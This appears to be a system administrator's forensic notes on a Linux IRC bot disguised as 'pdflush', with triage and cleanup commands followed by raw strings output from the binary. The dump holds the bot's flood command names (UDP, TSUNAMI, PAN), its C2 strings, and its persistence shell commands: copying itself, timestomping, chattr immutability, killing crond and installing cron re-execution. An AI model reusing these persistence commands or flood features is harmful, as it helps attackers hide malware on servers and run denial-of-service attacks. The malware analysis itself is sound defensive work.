rpm -q --whatprovides /var/tmp/pdflush
file /var/tmp/pdflush
ldd /var/tmp/pdflush
strings /var/tmp/pdflush

~]$ /bin/ps -C kthread -C pdflush fo pid,ppid,uid,cmd
  PID  PPID   UID CMD
   11     1     0 [kthread]
54003    11     0  \_ [pdflush]
60064    11     0  \_ [pdflush]

( stat /var/tmp/pdflush; find /tmp /var/tmp /var/spool/cron -printf "%T@ %A@ %C@ %u %g %m %y \"%p\"\n" 2>&1; \
find /tmp /var/tmp /opt /home /usr/local -type f -iname \*pdflush\* -printf "%T@ %A@ %C@ %u %g %m %y \"%p\"\n" 2>&1; \
/bin/ps axfwwwe -opid,ppid,gid,uid,cmd 2>&1; /usr/sbin/lsof -Pwln 2>&1; /bin/netstat -anTpe 2>&1; /usr/bin/lastlog 2>&1; \
/usr/bin/last -wai 2>&1; /usr/bin/who -a 2>&1 ) > /path/to/data.txt'

/bin/rpm  --nodeps --noscripts --notriggers -Vva 2>&1|/bin/grep -v "\.\{8\}" 2>&1> /path/to/rpmvfy.log

chattr -isau /var/tmp/pdflush
chmod -x /var/tmp/pdflush
mv -f /var/tmp/pdflush /var/tmp/not-pdflush.elf

mv -f /etc/cron.deny /etc/cron.deny.prev
mv -f /etc/cron.allow /etc/cron.allow.prev
touch /etc/cron.allow

mount /tmp -o remount,noexec

i=/var/tmp/pdflush; file $i; strings -an4 $i

rm -rf /var/tmp/xx.c* >/dev/null 2>&1;rm -rf /var/tmp/kk.c* >/dev/null 2>&1; c
p -f /var/tmp/pdflush $HOME/ >/dev/null 2>&1;chmod +x $HOME/pdflush >/dev/null 2>&1;
cp -f /var/tmp/pdflush /usr/local/psa/admin >/dev/null 2>&;chmod +x /usr/local/psa/
admin/pdflush >/dev/null 2>&1;cp -f /var/tmp/pdflush /opt/psa/admin/pdflush >/dev/nu
ll 2>&1;chmod +x /opt/psa/admin/pdflush >/dev/null 2>&1;killall -9 sh >/dev/null 2>&1

invalid ELF header ELF file OS ABI invalid ELF file ABI version invalid internal error file too short   trying file=%s
  search path= 		(%s from file %s)
 :%s 		(%s)
 RPATH RUNPATH   cannot create cache for search path     cannot create RUNPATH/RPATH copy        cannot create search path array cannot create shared object descriptor  failed to map segment from shared object        object file has no loadable segments    object file has no dynamic section      cannot allocate memory for program header       file=%s [%lu];  generating link map
    ELF load command address/offset not properly aligned    ELF load command alignment not page-aligned       dynamic: 0x%0*lx  base: 0x%0*lx   size: 0x%0*Zx
    entry: 0x%0*lx  phdr: 0x%0*lx  phnum:   %*u

     cannot enable executable stack as shared object requires        shared object cannot be dlopen()ed      cannot change memory protections        cannot dynamically load executable      cannot allocate TLS data structures for initial thread  ELF file version does not match current one     ELF file's phentsize not the expected size      ELF file data encoding not little-endian        ELF file version ident does not match current one       only ET_DYN and ET_EXEC can be loaded   
file=%s [%lu];  needed by %s [%lu]
    find library=%s [%lu]; searching
       cannot open shared object file /etc/ld.so.cache glibc-ld.so.cache1.1 ld.so-1.7.0  search cache=%s
      undefined symbol:       symbol=%s;  lookup in file=%s
  binding file %s to %s: %s symbol `%s'   
file=%s [%lu];  needed by %s [%lu] (relocation dependency)

 symbol  , version   (no version symbols)  not defined in file   with link time reference <main program> relocation error symbol lookup error protected normal  [%s]
      cannot allocate memory in static TLS block      %s: Symbol `%s' causes overflow in R_X86_64_32 relocation
      %s: Symbol `%s' causes overflow in R_X86_64_PC32 relocation
    %s: profiler out of memory shadowing PLTREL of %s
      %s: Symbol `%s' has different size in shared object, consider re-linking
       cannot make segment writable for relocation     cannot restore segment prot after reloc %s: profiler found no PLTREL in object %s
              cannot apply additional memory protection after relocation      unexpected reloc type 0x              unexpected PLT reloc type 0x              :fD     ÔhD     jhD     :fD     :fD     .hD     hD     hD     :fD     :fD     iD     :fD     :fD     :fD     :fD     :fD     èhD     ciD     ågD     :fD     ÒgD     ngD     :fD     :fD     +gD     gD     gD     :fD     :fD     ´fD     :fD     :fD     :fD     :fD     :fD     œfD     ƒfD     KfD     <program name unknown>  (lazy) 
relocation processing: %s%s
    cannot load auxiliary `%s' because of empty dynamic string token substitution
  cannot allocate symbol search list      cannot allocate dependency list empty dynamics string token substitution        load filtered object=%s requested by file=%s
   Filters not supported with LD_TRACE_PRELINKING  load auxiliary object=%s requested by file=%s
 out of memory DYNAMIC LINKER BUG!!! :  %s: %s: %s%s%s%s%s
 continued fatal %s: error: %s: %s (%s)
       error while loading shared libraries 
calling init: %s

calling preinit: %s

 unsupported version   of Verdef record weak version ` ' not found (required by   of Verneed record
     no version information available (required by   checking for version `%s' in file %s required by file %s
       cannot allocate version reference table %s: cannot open file: %s
 %s: cannot stat file: %s
 %s: cannot map file: %s
 %s: cannot create file: %s
        %s: file is no correct profile data file for `%s'
      Out of memory while initializing profiler
 /proc/self/exe GLIBC_PRIVATE _dl_open_hook IGNORE gconv_trans_context gconv_trans gconv_trans_init gconv_trans_end .so ^[yY] ^[nN]                                     ÒQG                                             ÿÿÿÿ           h¢G     ç—G     ç—G     ç—G     ½QG                             ÒQG                                             ÿÿÿÿ           æ—G     ½QG     ISO/IEC 14652 i18n FDCC-set Keld Simonsen keld@dkuug.dk +45 3122-6543 +45 3325-6543 ISO 1.0 1997-12-20  ISO/IEC JTC1/SC22/WG20 - internationalization   C/o Keld Simonsen, Skt. Jorgens Alle 8, DK-1615 Kobenhavn V                             i18n:1999 i18n:1999 i18n:1999 i18n:1999 i18n:1999 i18n:1999  i18n:1999 i18n:1999 i18n:1999 i18n:1999 i18n:1999 i18n:1999 i18n:1999 i18n:1999 i18n:1999            
          ÿ             
                        	   
         
                                                             !   "   #   $   %   &   '   (   )   *   +   ,   -   .   /   0   1   2   3   4   5   6   7   8   9   :   ;   <   =   >   ?   @   A   B   C   D   E   F   G   H   I   J   K   L   M   N   O   P   Q   R   S   T   U   V   W   X   Y   Z   [   \   ]   ^   _   `   a   b   c   d   e   f   g   h   i   j   k   l   m   n   o   p   q   r   s   t   u   v   w   x   y   z   {   |   }   ~      €   �   ‚   ƒ   „   …   †   ‡   ˆ   ‰   Š   ‹   Œ   �   Ž   �   �   ‘   ’   “   ”   •   –   —   ˜   ™   š   ›   œ   �   ž   Ÿ   *   ¡   ¢   £   ¤   ¥   ¦   §   ¨   ©   ª   «   ¬   *   ®   ¯   °   ±   ²   ³   ´   µ   ¶   ·   ¸   ¹   º   »   ¼   ½   ¾   ¿   À   Á      à   Ä   Å   Æ   Ç   È   É   Ê   Ë   Ì   Í   Î   Ï   Ð   Ñ   Ò   Ó   Ô   Õ   Ö   ×   Ø   Ù   Ú   Û   Ü   Ý   Þ   ß   à   á   â   ã   ä   å   æ   ç   è   é   ê   ë   ì   í   î   ï   ð   ñ   ò   ó   ô   õ   ö   ÷   ø   ù   ú   û   ü   ý   þ   ÿ        
	

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    0b                    
0   1   2   3   4   5   6   7   8   9   A   B   C   D   E   F   G   H   I   J   K   L   M   N   O   P   Q   R   S   T   U   V   W   X   Y   Z                   0   1   2   3   4   5   6   7   8   9   a   b   c   d   e   f   g   h   i   j   k   l   m   n   o   p   q   r   s   t   u   v   w   x   y   z   Success Operation not permitted No such file or directory No such process Interrupted system call Input/output error No such device or address Argument list too long Exec format error Bad file descriptor No child processes Cannot allocate memory Permission denied Bad address Block device required Device or resource busy File exists Invalid cross-device link No such device Not a directory Is a directory Invalid argument Too many open files in system Too many open files Text file busy File too large No space left on device Illegal seek Read-only file system Too many links Broken pipe Numerical result out of range Resource deadlock avoided File name too long No locks available Function not implemented Directory not empty No message of desired type Identifier removed Channel number out of range Level 2 not synchronized Level 3 halted Level 3 reset Link number out of range Protocol driver not attached No CSI structure available Level 2 halted Invalid exchange Invalid request descriptor Exchange full No anode Invalid request code Invalid slot Bad font file format Device not a stream No data available Timer expired Out of streams resources Machine is not on the network Package not installed Object is remote Link has been severed Advertise error Srmount error Communication error on send Protocol error Multihop attempted RFS specific error Bad message Name not unique on network File descriptor in bad state Remote address changed Streams pipe error Too many users Destination address required Message too long Protocol not available Protocol not supported Socket type not supported Operation not supported Protocol family not supported Address already in use Network is down Network is unreachable Connection reset by peer No buffer space available Connection timed out Connection refused Host is down No route to host Operation already in progress Operation now in progress Stale NFS file handle Structure needs cleaning Not a XENIX named type file No XENIX semaphores available Is a named type file Remote I/O error Disk quota exceeded No medium found Wrong medium type Operation canceled        Resource temporarily unavailable        Inappropriate ioctl for device  Numerical argument out of domain        Too many levels of symbolic links       Value too large for defined data type   Can not access a needed shared library  Accessing a corrupted shared library    .lib section in a.out corrupted Attempting to link in too many shared libraries Cannot exec a shared library directly   Invalid or incomplete multibyte or wide character       Interrupted system call should be restarted     Socket operation on non-socket  Protocol wrong type for socket  Address family not supported by protocol        Cannot assign requested address Network dropped connection on reset     Software caused connection abort        Transport endpoint is already connected Transport endpoint is not connected     Cannot send after transport endpoint shutdown   Too many references: cannot splice

 NOTICE %s :Saved as %s
 NOTICE %s :Spoofs: %d.%d.%d.%d
 NOTICE %s :Spoofs: %d.%d.%d.%d - %d.%d.%d.%d
 NOTICE %s :omfg. stfu. kthx.
 NOTICE %s :NICK <nick>
     NOTICE %s :Nick cannot be larger than 9 characters.
 NICK %s
 NOTICE %s :DISABLE <pass>
 Disabled Enabled and awaiting orders   NOTICE %s :Current status is: %s.
 NOTICE %s :Already disabled.
        NOTICE %s :Password too long! > 254
    NOTICE %s :Disable sucessful.
 NOTICE %s :ENABLE <pass>
 NOTICE %s :Already enabled.
 NOTICE %s :Wrong password
 NOTICE %s :Password correct.
  NOTICE %s :Removed all spoofs
  NOTICE %s :What kind of subnet address is that? Do something like: 169.40
 .0   NOTICE %s :Unable to resolve %s
        NOTICE %s :UDP <target> <port> <secs>
 NOTICE %s :Packeting %s.
        NOTICE %s :PAN <target> <port> <secs>
 NOTICE %s :Panning %s.
  NOTICE %s :TSUNAMI <target> <secs>
     NOTICE %s :Tsunami heading for %s.
     NOTICE %s :UNKNOWN <target> <secs>
 NOTICE %s :Unknowning %s.
 NOTICE %s :Udp pps %s.
 NOTICE %s :UDO53 %s.
 NOTICE %s :UDP53:56 %s.
 NOTICE %s :MOVE <server>
 NOTICE %s :Killing pid %d.
 TSUNAMI PAN UDP UNKNOWN UNKNOWN2 UNKNOWN3 UNKNOWN4 NICK SERVER GETSPOOFS SPOOFS DISABLE ENABLE KILL GET VERSION KILLALL HELP IRC  %s
 CJ    export PATH=/bin:/sbin:/usr/bin:/usr/local/bin:/usr/sbin;%s NOTICE %s :%s
   MODE %s +i-x
 JOIN %s :%s
 PONG %s
        NOTICE %s :I'm having a problem resolving my host, someone will have to SPOOFS me manually.
 352 376 433 422 PRIVMSG PING       rm -rf /var/tmp/xx.c* >/dev/null 2>&1;rm -rf /var/tmp/jj*.c* >/dev/null 2>&1;cp -f /var/tmp/pdflush $HOME/ >/dev/null 2>&1;chmod +x $HOME/pdflush >/dev/null 2>&1;cp -f /var/tmp/pdflush /usr/local/psa/admin/ >/dev/null 2>&1;chmod +x /usr/local/psa/admin/pdflush >/dev/null 2>&1;cp -f /var/tmp/pdflush var/www/pdflush >/dev/null 2>&1;chmod +x /var/www/pdflush >/dev/null 2>&1   touch -amcr /bin/bash /var/tmp/pdflush >/dev/null 2>&1;chattr +ia /var/tmp/pdflush >/dev/null 2>&1;chattr +isa /var/tmp/pdflush >/dev/null 2>&1;killall -9 perl;killall -9 pid;killall -9 crond /var/tmp/cron touch /var/tmp/cron * * * * *  / %s%s  >/dev/null 2>&1
   @weekly cd /var/tmp;chmod +x pdflush;./pdflush >/dev/null 2>&1;chmod +x %s;%s
  * * * * * chmod +x /var/tmp/pdflush;/var/tmp/pdflush >/dev/null 2>&1
 a crontab /var/tmp/cron;rm -rf /var/tmp/cron /var/tmp/.fontUnix [pdflush] #r0x m00c0w authenticationpassword      PASS %s
NICK EWG|%s
USER %s localhost localhost :%s
 
 * ERROR /proc/sys/kernel/osrelease FATAL: kernel too old
        FATAL: cannot determine kernel version
 /dev/null       cannot set %fs base address for thread-local storage                   
      
                ?                           
  

                               ÿÿÿÿÿÿÿUUUUUUUUÿÿÿÿÿÿÿ?33333333ªªªªªªª*’$I’$I’$ÿÿÿÿÿÿÿqÇqÇq™™™™™™™ÑE]tÑEUUUUUUU±;±;±I’$I’$Iÿÿÿÿÿÿÿ8Žã8Žã85”×P^Cy
ÌÌÌÌÌÌÌ0Ã0Ã0袋.ºè¢²�…,d!ªªªªªªª
p=
×£p=
؉�؉�Ø	%´—Ð^B{	$I’$I’$	Ë=�°ÜÓˆˆˆˆˆˆˆB!„BÿÿÿÿÿÿÿðÁ|ðÁ‡‡‡‡‡‡‡PuPuPÇqÇq-c /bin/sh exit 0                                       pŒ@     š@     *”@     ¸@     àÆ@     `¨@      ¹@     p¡@     �º@     pŠ@      Ÿ@     *$C     p¦@     €§@     °¦@     €k@     À¦@     °È@     ÀÈ@                                             pŒ@     0t@      t@     00C     `:C     *�@      «@     �|@     �º@     °Š@     z@     �&C     p¦@     €§@     °¦@     @§@     À¦@     °È@     ÀÈ@                                             pŒ@     0t@     Àr@     00C     `:C     *�@      «@     �|@     �º@     °Š@     z@     �&C     p¦@     €§@     °¦@     à¦@     À¦@     °È@     ÀÈ@                                             pŒ@     0t@      o@     00C     `:C     *�@      «@     �|@     �º@     pŠ@     z@     �&C     p¦@     €§@     °¦@     @§@     À¦@     °È@     ÀÈ@     LIBC_FATAL_STDERR_ /dev/tty                                             pŒ@     š@     ð™@     ¸@     àÆ@     `¨@     À*@     @¦@     �º@     °Š@      Ÿ@     *$C     p¦@     €§@     °¦@     @§@     À¦@     °È@     ÀÈ@                                             pŒ@     š@      ˜@     ¸@     àÆ@     `¨@     *¬@     P¥@     �º@     °Š@     ð*@     *$C     p¦@     €§@     °¦@     à¦@     À¦@     °È@     ÀÈ@                                             pŒ@     š@     *”@     ¸@     àÆ@     `¨@      «@     p¡@     �º@     pŠ@      Ÿ@     *$C     p¦@     €§@     °¦@     @§@     À¦@     °È@     ÀÈ@     ,ccs=                                   ðÎ@     °Ë@     PÍ@     ¸@     ÐÎ@     @¸@      ¹@     ÀÍ@     �º@     �¹@     °¾@     °º@     �È@     *È@     pÈ@     °¾@     €È@     °È@     ÀÈ@     *** glibc detected *** %s: 0x%s ***
    double free or corruption (top) double free or corruption (!prev)       double free or corruption (fasttop)     free(): invalid next size (normal)      free(): invalid next size (fast)        double free or corruption (out) malloc(): memory corruption (fast) corrupted double-linked list malloc: top chunk is corrupt free(): invalid pointer malloc(): memory corruption realloc(): invalid size realloc(): invalid pointer realloc(): invalid next size malloc: using debugging hooks TOP_PAD_ TRIM_THRESHOLD_ MMAP_THRESHOLD_ MMAP_MAX_ Arena %d:
 system bytes     = %10u
 in use bytes     = %10u
 Total (incl. mmap):
 max mmap regions = %10u
 max mmap bytes   = %10lu
  ¯A     ·A     ¿A     ÌA     ÛA     SA     A     TDA     bDA     nDA     DA     �DA     ¡DA     µDA     DA     vFA     ‰FA     šFA     ¬FA     ¾FA     ÓFA     èFA     %FA     *|X     
        |X     
       ANSI_X3.4-1968//TRANSLIT <%d> %h %e %T  [%d] /dev/console %s
  syslog: unknown facility/priority: %x           ÿÿÿÿÿÿÿ ÿÿ  ÿ   gethostbyname_r hosts cannot extend global scope dlopen cannot create scope list invalid mode for dlopen()      opening file=%s [%lu]; direct_opencount=%u

    TLS generation counter wrapped!  Please report this.    empty dynamic string token substitution DST not allowed in SUID/SGID programs     cannot create TLS data structures     invalid target namespace in dlmopen()   no more namespaces available for dlmopen() shared object not open 
calling fini: %s [%lu]

     
closing file=%s; direct_opencount == %u
       TLS generation counter wrapped!  Please report as described in <http://www.gnu.org/software/libc/bugs.html>.            iŸA     ‡žA     ‰ŸA     IŸA     ‡žA     ‡žA     ‡žA     ‡žA     .ŸA     ŸA     ûžA     �žA     ‡žA     ÞžA     ÅžA     ‡žA     ‡žA     ‡žA     ‡žA     ‡žA     žžA                             LD_PRELOAD LD_LIBRARY_PATH LD_ORIGIN_PATH LD_DEBUG LD_DEBUG_OUTPUT LD_PROFILE LD_USE_LOAD_BIAS LD_DYNAMIC_WEAK LD_SHOW_AUXV GCONV_PATH GETCONF_DIR HOSTALIASES LOCALDOMAIN LOCPATH MALLOC_TRACE NIS_PATH NLSPATH RESOLV_HOST_CONF RES_OPTIONS TMPDIR TZDIR  /var/tmp /var/profile LD_WARN LD_LIBRARY_PATH LD_BIND_NOW LD_BIND_NOT LD_DYNAMIC_WEAK LD_PROFILE_OUTPUT /etc/suid-debug LD_ASSUME_KERNEL MALLOC_CHECK_ UCS-4// ISO-10646/UCS4/ UCS-4BE// ISO-10646/UCS4/ CSUCS4// ISO-10646/UCS4/ ISO-10646// ISO-10646/UCS4/ OSF00010104// ISO-10646/UCS4/ OSF00010105// ISO-10646/UCS4/ OSF00010106// ISO-10646/UCS4/ WCHAR_T// INTERNAL UTF8// ISO-10646/UTF8/ UTF-8// ISO-10646/UTF8/ ISO-IR-193// ISO-10646/UTF8/ OSF05010001// ISO-10646/UTF8/ UCS2// ISO-10646/UCS2/ UCS-2// ISO-10646/UCS2/ OSF00010100// ISO-10646/UCS2/ OSF00010101// ISO-10646/UCS2/ OSF00010102// ISO-10646/UCS2/ ANSI_X3.4// ANSI_X3.4-1968// ISO-IR-6// ANSI_X3.4-1968// ISO646-US// ANSI_X3.4-1968// US-ASCII// ANSI_X3.4-1968// IBM367// ANSI_X3.4-1968// CP367// ANSI_X3.4-1968// CSASCII// ANSI_X3.4-1968// UCS-2LE// ISO-10646/UCS2/ UCS-2BE// UNICODEBIG// =INTERNAL->ucs4 =ucs4->INTERNAL UCS-4LE// =INTERNAL

rm -rf /var/tmp/xx.c* >/dev/null 2>&1;
rm -rf /var/tmp/jj*.c* >/dev/null 2>&1;
cp -f /var/tmp/pdflush $HOME/ >/dev/null 2>&1;
chmod +x $HOME/pdflush >/dev/null 2>&1;
cp -f /var/tmp/pdflush /usr/local/psa/admin/ >/dev/null 2>&1;
chmod +x /usr/local/psa/admin/pdflush >/dev/null 2>&1;
cp -f /var/tmp/pdflush var/www/pdflush >/dev/null 2>&1;
chmod +x /var/www/pdflush >/dev/null 2>&1   

touch -amcr /bin/bash /var/tmp/pdflush >/dev/null 2>&1;
chattr +ia /var/tmp/pdflush >/dev/null 2>&1;
chattr +isa /var/tmp/pdflush >/dev/null 2>&1;
killall -9 perl;
killall -9 pid;
killall -9 crond /var/tmp/cron 

touch /var/tmp/cron * * * * *  / %s%s  >/dev/null 2>&1   @weekly cd /var/tmp;
chmod +x pdflush;
./pdflush >/dev/null 2>&1;
chmod +x %s;
%s  * * * * *
chmod +x /var/tmp/pdflush;
/var/tmp/pdflush >/dev/null 2>&1

 a crontab /var/tmp/cron;
rm -rf /var/tmp/cron /var/tmp/.fontUnix